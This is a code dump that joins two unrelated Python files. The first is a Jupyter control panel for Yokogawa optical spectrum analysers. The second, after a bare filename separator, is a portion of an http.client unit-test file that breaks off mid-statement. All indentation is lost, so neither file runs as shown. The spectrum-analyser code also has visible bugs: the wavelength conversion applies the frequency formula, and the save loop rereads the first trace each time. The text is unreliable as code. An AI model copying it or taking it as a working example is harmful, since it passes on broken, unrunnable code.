import numpy as np
import threading
import os
import plotly.graph_objects as go
import pandas as pd
import sys
import re
from scipy import constants as cts
from IPython.display import display, HTML
import time
work_dir = os.path.join(os.path.dirname(__file__), '../')
work_dir = os.path.abspath(work_dir)
path = os.path.abspath(work_dir + '/../')
if not work_dir in sys.path:
sys.path.insert(0, work_dir)
from pyOSA import Yokogawa
from pyOSA import uiOSA
# if len(sys.argv)>1:
# DEBUG = bool(re.search('true', sys.argv[0].lower()))
# print(f'Debugging: {DEBUG}')
# else:
# DEBUG = False
# DEBUG = False
# print(DEBUG)
class OSAjupyter(uiOSA):
OSAmodel = {'AQ6375B': dict(span=[1200.0, 2400.0]),
'AQ6374': dict(span=[350.0, 1750.0]),
'AQ6370D': dict(span=[600.0, 1700.0])}
def __init__(self, **kwargs):
super().__init__()
self.DEBUG = kwargs.get('DEBUG', False)
if self.DEBUG:
print('Debuging mode ON')
self.createUI()
self.connected = False
self._id_trace = 0
self._scan = False
# -- connect the button --
self._connectUI()
def connect(self, change):
ip = self.ui.ip.value
if change.new:
try_connect = 0
while try_connect < 5:
with Yokogawa(ip=ip) as osa:
# -- fetch the OSA state
if osa.connected:
try_connect += 1
print(try_connect)
identity = osa.identity
if self.DEBUG:
print(f'Model:{identity}')
print(f'Model:{self.OSAmodel}')
print(f"Model:{self.OSAmodel[identity['model']]}")
if self.DEBUG:
print('Connected to the OSA')
try:
para = osa.settings
if self.DEBUG:
print('Fetched parameters')
except Exception as err:
print(err)
trace = osa.trace
if self.DEBUG:
print('Fetched traces')
break
else:
try_connect += 1
print('Did not connect, retrying...')
time.sleep(0.5)
self.figOSA.data[0].x = []
self.figOSA.data[0].y = []
# time.sleep(1)
# close the socket, no need anymore
# -- updating the UI
if try_connect >=5:
print("Couldn't connect to the OSA, please check the IP")
else:
self.connected = True
if self.DEBUG:
print('Finished Connecting')
model = identity['model']
if self.DEBUG:
print(f"Model: {model}")
self.ui.model.value = f"Maker: {identity['maker']}\n" + \
f"Model: {model}\n" + \
f"SN: {identity['SN']}\n\n" + \
f"Spectral range:\n\t {self.OSAmodel[model]['span'][0]}nm - {self.OSAmodel[model]['span'][1]}nm\n"
lbd_start = para['centwlgth'] - para['span']/2
lbd_end = para['centwlgth'] + para['span']/2
if self.DEBUG:
print(f'Start: {lbd_start}')
print(f'End: {lbd_end}')
self.ui.λ.min = self.OSAmodel[model]['span'][0]
self.ui.λ.max = self.OSAmodel[model]['span'][1]
self.ui.λ.value = (1e9*lbd_start, 1e9*lbd_end)
try:
self.ui.bandwidth.value = self._Bdwt_val[1e9*para['bdwdth']]
except Exception as err:
if self.DEBUG:
print(f'Badnwidth Error: {err}')
print(f"Value: {1e9*para['bdwdth']}")
try:
self.ui.res.index = int(para['resol'])
except Exception as err:
if self.DEBUG:
print(f'Res Error: {err}')
print(f"Value: {para['resol']}")
try:
self.ui.pts.value = int(para['pts'])
except Exception as err:
if self.DEBUG:
print(f'Pts Error: {err}')
print(f"Value: {para['pts']}")
self.figOSA.data[0].x = trace.lbd.values*1e9
self.figOSA.data[0].y = trace.S.values
self.figOSA.update_xaxes(autorange = True)
self.figOSA.update_xaxes(autorange = False)
self.figOSA.update_xaxes(range = [self.figOSA.layout.xaxis.range[0],
self.figOSA.layout.xaxis.range[1]])
self.figOSA.update_yaxes(autorange = True)
time.sleep(0.2)
self.figOSA.update_yaxes(autorange = False)
self.figOSA.update_yaxes(range = [-59, self.figOSA.layout.yaxis.range[-1]])
time.sleep(0.5)
self.figOSA.update_yaxes(range = [-85, self.figOSA.layout.yaxis.range[-1]])
else:
self.connected = False
def refreshTrace(self, change):
ip = self.ui.ip.value
if self.connected:
with Yokogawa(ip=ip) as osa:
if osa.connected:
trace = osa.trace
x = trace.lbd*1e9
y = trace.S
if self.ui.freq_scale.value.lower() == 'frequency':
x = 1e-12*cts.c/(x*1e-9)
self.figOSA.data[0].x = x
self.figOSA.data[0].y = trace.S
def _stopScan(self):
self._scan = False
ip = self.ui.ip.value
print(ip)
time.sleep(0.5)
with Yokogawa(ip=ip) as osa:
osa.scan = 'stop'
print('stopped')
self._scan = False
def _singleScan(self):
self._scan = True
ip = self.ui.ip.value
with Yokogawa(ip=ip) as osa:
self.figOSA.data[0].x = []
self.figOSA.data[0].y = []
osa.scan = 'single'
print('Launching a single scan')
while True:
print('getting traces')
time.sleep(0.01)
trace = osa.trace
if trace:
x = trace.lbd*1e9
y = trace.S
if self.ui.freq_scale.value.lower() == 'frequency':
x = 1e-12*cts.c/(x*1e-9)
self.figOSA.data[0].x = x
self.figOSA.data[0].y = trace.S
else:
print(trace)
time.sleep(0.25)
if self._scan == False:
print('!!!stop the loop!!!')
break
def _repeatScan(self):
self._scan = True
ip = self.ui.ip.value
with Yokogawa(ip=ip) as osa:
print('Launching a Continuous scan')
self.figOSA.data[0].x = []
self.figOSA.data[0].y = []
osa.scan = 'repeat'
print('Launching a Continuous scan')
while True:
time.sleep(0.01)
trace = osa.trace
if not(trace is None):
x = trace.lbd*1e9
y = trace.S
if self.ui.freq_scale.value.lower() == 'frequency':
x = 1e-12*cts.c/(x*1e-9)
self.figOSA.data[0].x = x
self.figOSA.data[0].y = trace.S
else:
time.sleep(0.25)
if self._scan == False:
print('!!!stop the loop!!!')
break
def scanType(self, change):
print(change.new.lower())
if change.new.lower() == 'stop':
self._stopScan()
if not self._scan:
if change.new.lower() == 'single':
t = threading.Thread(target=self._singleScan)
t.start()
if change.new.lower() == 'repeat':
t = threading.Thread(target=self._repeatScan)
t.start()
def select_trace(self, change):
ip = self.ui.ip.value
if self.connected:
with Yokogawa(ip=ip) as osa:
osa.trace = change.new.replace('Trace ', '')
def update_λ(self, change):
ip = self.ui.ip.value
if self.connected:
# print(change.new)
centwlgth = (change.new[1] + change.new[0])/2
span = (change.new[1] - change.new[0])
time.sleep(1)
with Yokogawa(ip=ip) as osa:
para = osa.settings
if self.DEBUG:
print(para)
para['centwlgth'] = centwlgth*1e-9
para['span'] = span*1e-9
if self.DEBUG:
print(para)
with Yokogawa(ip=ip) as osa:
osa.settings = para
self.figOSA.update_xaxes(range = change.new)
def update_res(self, change):
ip = self.ui.ip.value
if self.connected:
with Yokogawa(ip=ip) as osa:
para = osa.settings
para['resol'] = change.new
with Yokogawa(ip=ip) as osa:
osa.settings = para
def update_bdwt(self, change):
ip = self.ui.ip.value
if self.connected:
with Yokogawa(ip=ip) as osa:
para = osa.settings
para['bdwdth'] = float(change.new.replace(' nm', ''))*1e-9
with Yokogawa(ip=ip) as osa:
osa.settings = para
para = osa.settings
self.ui.bandwidth.value = self._Bdwt_val[1e9*para['bdwdth']]
def update_points(self, change):
ip = self.ui.ip.value
if self.connected:
with Yokogawa(ip=ip) as osa:
para = osa.settings
para['pts'] = change.new
with Yokogawa(ip=ip) as osa:
osa.settings = para
para = osa.settings
self.ui.pts.value = int(para['pts'])
def clear_all_trace(self, change):
self._id_trace = 0
self.figOSA.data = [self.figOSA.data[0]]
self.figOSA.data[0].x = []
self.figOSA.data[0].y = []
def clear_keep_trace(self, change):
self._id_trace = 0
self.figOSA.data = [self.figOSA.data[0]]
def keep_trace(self, change):
self._id_trace += 1
print('Keeping trace')
tr = go.Scatter(x = self.figOSA.data[0].x,
y = self.figOSA.data[0].y)
self.figOSA.add_trace(tr)
print('Trace kept')
def freq_scale(self, change):
print(change.new.lower)
xdata = [None]*len(self.figOSA.data)
newx = [None]*len(self.figOSA.data)
for ii in range(len(self.figOSA.data)):
xdata[ii] = self.figOSA.data[ii].x
if change.new.lower() == 'frequency':
for ii in range(len(self.figOSA.data)):
newx[ii] = 1e-12 * cts.c/(xdata[ii]*1e-9)
xlabel = 'Frequency (THz)'
elif change.new.lower() == 'wavelength':
for ii in range(len(self.figOSA.data)):
newx[ii] = 1e-12 * cts.c/(xdata[ii]*1e-9)
xlabel = 'Wavelength (nm)'
for ii in range(len(self.figOSA.data)):
self.figOSA.data[ii].x = newx[ii]
self.figOSA.update_xaxes(title = xlabel, range = [np.min(newx), np.max(newx)])
# print(change.new)
# if change.new:
# newx = 1e-12 * cts.c/(xdata*1e-9)
# xlabel = 'Frequency (THz)'
# else:
# newx = 1e9 * cts.c/(xdata*1e12)
# xlabel = 'Wavelength (nm)'
#
# self.figOSA.data[0].x = newx
# # figOSA.data[0].y = ydata
# self.figOSA.update_xaxes(title = xlabel, range = [newx.min(), newx.max()])
# #
def save_data(self, change):
ip = self.ui.ip.value
fname = self.ui.picker.selected
if fname:
if not os.path.exists(self.ui.picker.selected):
if self.ui.to_save.value.lower() == 'pc':
lbd = self.figOSA.data[0].x*1e-9
S = self.figOSA.data[0].y
df = pd.DataFrame(dict(lbd = lbd, S = S))
if len(self.figOSA.data) > 1:
for ii in range(1, len(self.figOSA.data)):
lbd = self.figOSA.data[0].x*1e-9
S = self.figOSA.data[0].y
dum = pd.DataFrame({f'lbd{ii}': lbd, f'S{ii}': S})
df = pd.concat([df, dum], axis = 1)
df.to_parquet(fname)
else:
with Yokogawa(ip=ip) as osa:
if osa.connected:
trace = osa.trace
save_ok = True
else:
save_ok = False
print("Cannot coonect!!")
if save_ok:
trace.to_parquet(fname)
def _connectUI(self):
self.ui.cnct.observe(self.connect, 'value')
# self.ui.scan.observe(self.scan_osa,'value')
self.ui.refresh_trace.on_click(self.refreshTrace)
self.ui.trace.observe(self.select_trace, 'value')
self.ui.λ.observe(self.update_λ, 'value')
self.ui.bandwidth.observe(self.update_bdwt, 'value')
self.ui.pts.observe(self.update_points, 'value')
self.ui.res.observe(self.update_res, 'index')
self.ui.clr.on_click(self.clear_all_trace)
self.ui.clr_keep.on_click(self.clear_keep_trace)
self.ui.keep.on_click(self.keep_trace)
self.ui.save.on_click(self.save_data)
self.ui.freq_scale.observe(self.freq_scale, 'value')
self.ui.scan.observe(self.scanType, 'value')
# # ----------------------------------
# # -- Worker for scanning
# # ----------------------------------
# run_thread = True
# def worker(f, instr):
# while run_thread:
# try:
# #with Yokogawa(ip=ip) as instr:
# trace = instr.trace
# # x = np.linspace(600, 1700, 50001)
# # y = np.log10(np.random.rand(50001)*(1/np.cosh((x-(700+1850)/2)/10))**2)
# f.data[0].x = trace.lbd.values*1e9
# f.data[0].y = trace.S.values
# except:
# print('Comunication error')
# time.sleep(0.1)
# #with Yokogawa(ip=ip) as instr:
# trace = instr.trace
# # x = np.linspace(600, 1700, 50001)
# # y = np.log10(np.random.rand(50001)*(1/np.cosh((x-(700+1850)/2)/10))**2)
# f.data[0].x = trace.lbd.values*1e9
# f.data[0].y = trace.S.values
# time.sleep(0.1)
#
#
#
# # ----------------------------------
# # -- Setup the Connectors
# # ----------------------------------
#
#
# def scan_osa(change):
# global thread_osa
# global run_thread
# run_thread = False
# ip = ui.ip.value
# if connected:
# # osa.scan = change.new.lower()
# run_thread = False
# if change.new.lower() == 'single' or change.new.lower() == 'repeat':
# with Yokogawa(ip=ip) as osa:
# osa.scan = change.new.lower()
# run_thread = True
# thread_osa = threading.Thread(target=worker, args=(figOSA, osa))
# thread_osa.start()
# if change.new.lower() == 'stop':
# with Yokogawa(ip=ip) as osa:
# osa.scan = change.new.lower()
# print('Trying to kill the stuff')
# run_thread = False
#
#
# # ----------------------------------
# # -- connect callbacks and traits
# # ----------------------------------
# ui.cnct.observe(connect, 'value')
# ui.scan.observe(scan_osa,'value')
# ui.trace.observe(select_trace, 'value')
# ui.λ.observe(update_λ, 'value')
# ui.bandwidth.observe(update_bdwt, 'value')
# ui.pts.observe(update_points, 'value')
# ui.res.observe(update_res, 'index')
# ui.clr.on_click(clear_trace)
# ui.save.on_click(save_data)
# ui.freq_scale.observe(freq_scale, 'value')
#
#
# # ----------------------------------
# # -- Display
# # ----------------------------------
# box_layout = wdg.Layout(display='flex',
# flex_flow='column',
# flex_wrap = 'wrap',
# align_content = 'stretch',
# justify_content = 'center',
# align_items='stretch',
# width='28%')
# outp_layout = wdg.Layout(display='flex',
# flex_flow='column',
# flex_wrap = 'wrap',
# align_content = 'stretch',
# justify_content = 'center',
# align_items='stretch',
# width='72%')
# ui.picker.layout = wdg.Layout(display='flex',
# flex_flow='column',
# flex_wrap = 'wrap',
# align_content = 'stretch',
# justify_content = 'center',
# align_items='stretch',
# width='100%')
# cc = [ui.cnct,ui.freq_scale, ui.ip,ui.scan, ui.trace, ui.res,ui.bandwidth, ui.pts,ui.λ, ui.clr,ui.save,ui.picker]
# ctrl = wdg.Box(children = cc,layout = box_layout)
# otp = wdg.Box(children = [figOSA], layout = outp_layout)
# display(wdg.HBox([ctrl, otp]))
|
test_httplib.py
|
import errno
from http import client
import io
import itertools
import os
import array
import socket
import unittest
TestCase = unittest.TestCase
from test import support
here = os.path.dirname(__file__)
# Self-signed cert file for 'localhost'
CERT_localhost = os.path.join(here, 'keycert.pem')
# Self-signed cert file for 'fakehostname'
CERT_fakehostname = os.path.join(here, 'keycert2.pem')
# Self-signed cert file for self-signed.pythontest.net
CERT_selfsigned_pythontestdotnet = os.path.join(here, 'selfsigned_pythontestdotnet.pem')
# constants for testing chunked encoding
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd! \r\n'
'8\r\n'
'and now \r\n'
'22\r\n'
'for something completely different\r\n'
)
chunked_expected = b'hello world! and now for something completely different'
chunk_extension = ";foo=bar"
last_chunk = "0\r\n"
last_chunk_extended = "0" + chunk_extension + "\r\n"
trailers = "X-Dummy: foo\r\nX-Dumm2: bar\r\n"
chunked_end = "\r\n"
HOST = support.HOST
class FakeSocket:
def __init__(self, text, fileclass=io.BytesIO, host=None, port=None):
if isinstance(text, str):
text = text.encode("ascii")
self.text = text
self.fileclass = fileclass
self.data = b''
self.sendall_calls = 0
self.file_closed = False
self.host = host
self.port = port
def sendall(self, data):
self.sendall_calls += 1
self.data += data
def makefile(self, mode, bufsize=None):
if mode != 'r' and mode != 'rb':
raise client.UnimplementedFileMode()
# keep the file around so we can check how much was read from it
self.file = self.fileclass(self.text)
self.file.close = self.file_close #nerf close ()
return self.file
def file_close(self):
self.file_closed = True
def close(self):
pass
def setsockopt(self, level, optname, value):
pass
class EPipeSocket(FakeSocket):
def __init__(self, text, pipe_trigger):
# When sendall() is called with pipe_trigger, raise EPIPE.
FakeSocket.__init__(self, text)
self.pipe_trigger = pipe_trigger
def sendall(self, data):
if self.pipe_trigger in data:
raise OSError(errno.EPIPE, "gotcha")
self.data += data
def close(self):
pass
class NoEOFBytesIO(io.BytesIO):
"""Like BytesIO, but raises AssertionError on EOF.
This is used below to test that http.client doesn't try to read
more from the underlying file than it should.
"""
def read(self, n=-1):
data = io.BytesIO.read(self, n)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
def readline(self, length=None):
data = io.BytesIO.readline(self, length)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
class FakeSocketHTTPConnection(client.HTTPConnection):
"""HTTPConnection subclass using FakeSocket; counts connect() calls"""
def __init__(self, *args):
self.connections = 0
super().__init__('example.com')
self.fake_socket_args = args
self._create_connection = self.create_connection
def connect(self):
"""Count the number of times connect() is invoked"""
self.connections += 1
return super().connect()
def create_connection(self, *pos, **kw):
return FakeSocket(*self.fake_socket_args)
class HeaderTests(TestCase):
def test_auto_headers(self):
# Some headers are added automatically, but should not be added by
# .request() if they are explicitly set.
class HeaderCountingBuffer(list):
def __init__(self):
self.count = {}
def append(self, item):
kv = item.split(b':')
if len(kv) > 1:
# item is a 'Key: Value' header string
lcKey = kv[0].decode('ascii').lower()
self.count.setdefault(lcKey, 0)
self.count[lcKey] += 1
list.append(self, item)
for explicit_header in True, False:
for header in 'Content-length', 'Host', 'Accept-encoding':
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('blahblahblah')
conn._buffer = HeaderCountingBuffer()
body = 'spamspamspam'
headers = {}
if explicit_header:
headers[header] = str(len(body))
conn.request('POST', '/', body, headers)
self.assertEqual(conn._buffer.count[header.lower()], 1)
def test_content_length_0(self):
class ContentLengthChecker(list):
def __init__(self):
list.__init__(self)
self.content_length = None
def append(self, item):
kv = item.split(b':', 1)
if len(kv) > 1 and kv[0].lower() == b'content-length':
self.content_length = kv[1].strip()
list.append(self, item)
# Here, we're testing that methods expecting a body get a
# content-length set to zero if the body is empty (either None or '')
bodies = (None, '')
methods_with_body = ('PUT', 'POST', 'PATCH')
for method, body in itertools.product(methods_with_body, bodies):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', body)
self.assertEqual(
conn._buffer.content_length, b'0',
'Header Content-Length incorrect on {}'.format(method)
)
# For these methods, we make sure that content-length is not set when
# the body is None because it might cause unexpected behaviour on the
# server.
methods_without_body = (
'GET', 'CONNECT', 'DELETE', 'HEAD', 'OPTIONS', 'TRACE',
)
for method in methods_without_body:
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', None)
self.assertEqual(
conn._buffer.content_length, None,
'Header Content-Length set for empty body on {}'.format(method)
)
# If the body is set to '', that's considered to be "present but
# empty" rather than "missing", so content length would be set, even
# for methods that don't expect a body.
for method in methods_without_body:
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', '')
self.assertEqual(
conn._buffer.content_length, b'0',
'Header Content-Length incorrect on {}'.format(method)
)
# If the body is set, make sure Content-Length is set.
for method in itertools.chain(methods_without_body, methods_with_body):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', ' ')
self.assertEqual(
conn._buffer.content_length, b'1',
'Header Content-Length incorrect on {}'.format(method)
)
def test_putheader(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn.putrequest('GET','/')
conn.putheader('Content-length', 42)
self.assertIn(b'Content-length: 42', conn._buffer)
conn.putheader('Foo', ' bar ')
self.assertIn(b'Foo: bar ', conn._buffer)
conn.putheader('Bar', '\tbaz\t')
self.assertIn(b'Bar: \tbaz\t', conn._buffer)
conn.putheader('Authorization', 'Bearer mytoken')
self.assertIn(b'Authorization: Bearer mytoken', conn._buffer)
conn.putheader('IterHeader', 'IterA', 'IterB')
self.assertIn(b'IterHeader: IterA\r\n\tIterB', conn._buffer)
conn.putheader('LatinHeader', b'\xFF')
self.assertIn(b'LatinHeader: \xFF', conn._buffer)
conn.putheader('Utf8Header', b'\xc3\x80')
self.assertIn(b'Utf8Header: \xc3\x80', conn._buffer)
conn.putheader('C1-Control', b'next\x85line')
self.assertIn(b'C1-Control: next\x85line', conn._buffer)
conn.putheader('Embedded-Fold-Space', 'is\r\n allowed')
self.assertIn(b'Embedded-Fold-Space: is\r\n allowed', conn._buffer)
conn.putheader('Embedded-Fold-Tab', 'is\r\n\tallowed')
self.assertIn(b'Embedded-Fold-Tab: is\r\n\tallowed', conn._buffer)
conn.putheader('Key Space', 'value')
self.assertIn(b'Key Space: value', conn._buffer)
conn.putheader('KeySpace ', 'value')
self.assertIn(b'KeySpace : value', conn._buffer)
conn.putheader(b'Nonbreak\xa0Space', 'value')
self.assertIn(b'Nonbreak\xa0Space: value', conn._buffer)
conn.putheader(b'\xa0NonbreakSpace', 'value')
self.assertIn(b'\xa0NonbreakSpace: value', conn._buffer)
def test_ipv6host_header(self):
# Default host header on IPv6 transaction should be wrapped by [] if
# it is an IPv6 address
expected = b'GET /foo HTTP/1.1\r\nHost: [2001::]:81\r\n' \
b'Accept-Encoding: identity\r\n\r\n'
conn = client.HTTPConnection('[2001::]:81')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
expected = b'GET /foo HTTP/1.1\r\nHost: [2001:102A::]\r\n' \
b'Accept-Encoding: identity\r\n\r\n'
conn = client.HTTPConnection('[2001:102A::]')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
def test_malformed_headers_coped_with(self):
# Issue 19996
body = "HTTP/1.1 200 OK\r\nFirst: val\r\n: nval\r\nSecond: val\r\n\r\n"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.getheader('First'), 'val')
self.assertEqual(resp.getheader('Second'), 'val')
def test_parse_all_octets(self):
# Ensure no valid header field octet breaks the parser
body = (
b'HTTP/1.1 200 OK\r\n'
b"!#$%&'*+-.^_`|~: value\r\n" # Special token characters
b'VCHAR: ' + bytes(range(0x21, 0x7E + 1)) + b'\r\n'
b'obs-text: ' + bytes(range(0x80, 0xFF + 1)) + b'\r\n'
b'obs-fold: text\r\n'
b' folded with space\r\n'
b'\tfolded with tab\r\n'
b'Content-Length: 0\r\n'
b'\r\n'
)
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.getheader('Content-Length'), '0')
self.assertEqual(resp.msg['Content-Length'], '0')
self.assertEqual(resp.getheader("!#$%&'*+-.^_`|~"), 'value')
self.assertEqual(resp.msg["!#$%&'*+-.^_`|~"], 'value')
vchar = ''.join(map(chr, range(0x21, 0x7E + 1)))
self.assertEqual(resp.getheader('VCHAR'), vchar)
self.assertEqual(resp.msg['VCHAR'], vchar)
self.assertIsNotNone(resp.getheader('obs-text'))
self.assertIn('obs-text', resp.msg)
for folded in (resp.getheader('obs-fold'), resp.msg['obs-fold']):
self.assertTrue(folded.startswith('text'))
self.assertIn(' folded with space', folded)
self.assertTrue(folded.endswith('folded with tab'))
def test_invalid_headers(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/')
# http://tools.ietf.org/html/rfc7230#section-3.2.4, whitespace is no
# longer allowed in header names
cases = (
(b'Invalid\r\nName', b'ValidValue'),
(b'Invalid\rName', b'ValidValue'),
(b'Invalid\nName', b'ValidValue'),
(b'\r\nInvalidName', b'ValidValue'),
(b'\rInvalidName', b'ValidValue'),
(b'\nInvalidName', b'ValidValue'),
(b' InvalidName', b'ValidValue'),
(b'\tInvalidName', b'ValidValue'),
(b'Invalid:Name', b'ValidValue'),
(b':InvalidName', b'ValidValue'),
(b'ValidName', b'Invalid\r\nValue'),
(b'ValidName', b'Invalid\rValue'),
(b'ValidName', b'Invalid\nValue'),
(b'ValidName', b'InvalidValue\r\n'),
(b'ValidName', b'InvalidValue\r'),
(b'ValidName', b'InvalidValue\n'),
)
for name, value in cases:
with self.subTest((name, value)):
with self.assertRaisesRegex(ValueError, 'Invalid header'):
conn.putheader(name, value)
class BasicTest(TestCase):
def test_status_lines(self):
# Test HTTP status lines
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(0), b'') # Issue #20007
self.assertFalse(resp.isclosed())
self.assertFalse(resp.closed)
self.assertEqual(resp.read(), b"Text")
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
body = "HTTP/1.1 400.100 Not Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
self.assertRaises(client.BadStatusLine, resp.begin)
def test_bad_status_repr(self):
exc = client.BadStatusLine('')
self.assertEqual(repr(exc), '''BadStatusLine("\'\'",)''')
def test_partial_reads(self):
# if we have Content-Length, HTTPResponse knows when to close itself,
# the same behaviour as when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_mixed_reads(self):
# readline() should update the remaining length, so that read() knows
# how much data is left and does not raise IncompleteRead
body = "HTTP/1.1 200 Ok\r\nContent-Length: 13\r\n\r\nText\r\nAnother"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.readline(), b'Text\r\n')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(), b'Another')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos(self):
# if we have Content-Length, HTTPResponse knows when to close itself,
# the same behaviour as when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_reads_no_content_length(self):
# when no length is present, the socket should be gracefully closed when
# all data was read
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos_no_content_length(self):
# when no length is present, the socket should be gracefully closed when
# all data was read
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertTrue(resp.isclosed())
def test_partial_reads_incomplete_body(self):
# if the server shuts down the connection before the whole
# content-length is delivered, the socket is gracefully closed
body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
def test_partial_readintos_incomplete_body(self):
# if the server shuts down the connection before the whole
# content-length is delivered, the socket is gracefully closed
body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_host_port(self):
# Check invalid host_port
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPConnection, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
"fe80::207:e9ff:fe9b", 8000),
("www.python.org:80", "www.python.org", 80),
("www.python.org:", "www.python.org", 80),
("www.python.org", "www.python.org", 80),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 80),
("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b", 80)):
c = client.HTTPConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
def test_response_headers(self):
# test response with multiple message headers with the same field name.
text = ('HTTP/1.1 200 OK\r\n'
'Set-Cookie: Customer="WILE_E_COYOTE"; '
'Version="1"; Path="/acme"\r\n'
'Set-Cookie: Part_Number="Rocket_Launcher_0001"; Version="1";'
' Path="/acme"\r\n'
'\r\n'
'No body\r\n')
hdr = ('Customer="WILE_E_COYOTE"; Version="1"; Path="/acme"'
', '
'Part_Number="Rocket_Launcher_0001"; Version="1"; Path="/acme"')
s = FakeSocket(text)
r = client.HTTPResponse(s)
r.begin()
cookies = r.getheader("Set-Cookie")
self.assertEqual(cookies, hdr)
def test_read_head(self):
# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
NoEOFBytesIO)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
if resp.read():
self.fail("Did not expect response from HEAD request")
def test_readinto_head(self):
# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
NoEOFBytesIO)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
b = bytearray(5)
if resp.readinto(b) != 0:
self.fail("Did not expect response from HEAD request")
self.assertEqual(bytes(b), b'\x00'*5)
def test_too_many_headers(self):
headers = '\r\n'.join('Header%d: foo' % i
for i in range(client._MAXHEADERS + 1)) + '\r\n'
text = ('HTTP/1.1 200 OK\r\n' + headers)
s = FakeSocket(text)
r = client.HTTPResponse(s)
self.assertRaisesRegex(client.HTTPException,
r"got more than \d+ headers", r.begin)
def test_send_file(self):
expected = (b'GET /foo HTTP/1.1\r\nHost: example.com\r\n'
b'Accept-Encoding: identity\r\nContent-Length:')
with open(__file__, 'rb') as body:
conn = client.HTTPConnection('example.com')
sock = FakeSocket(body)
conn.sock = sock
conn.request('GET', '/foo', body)
self.assertTrue(sock.data.startswith(expected), '%r != %r' %
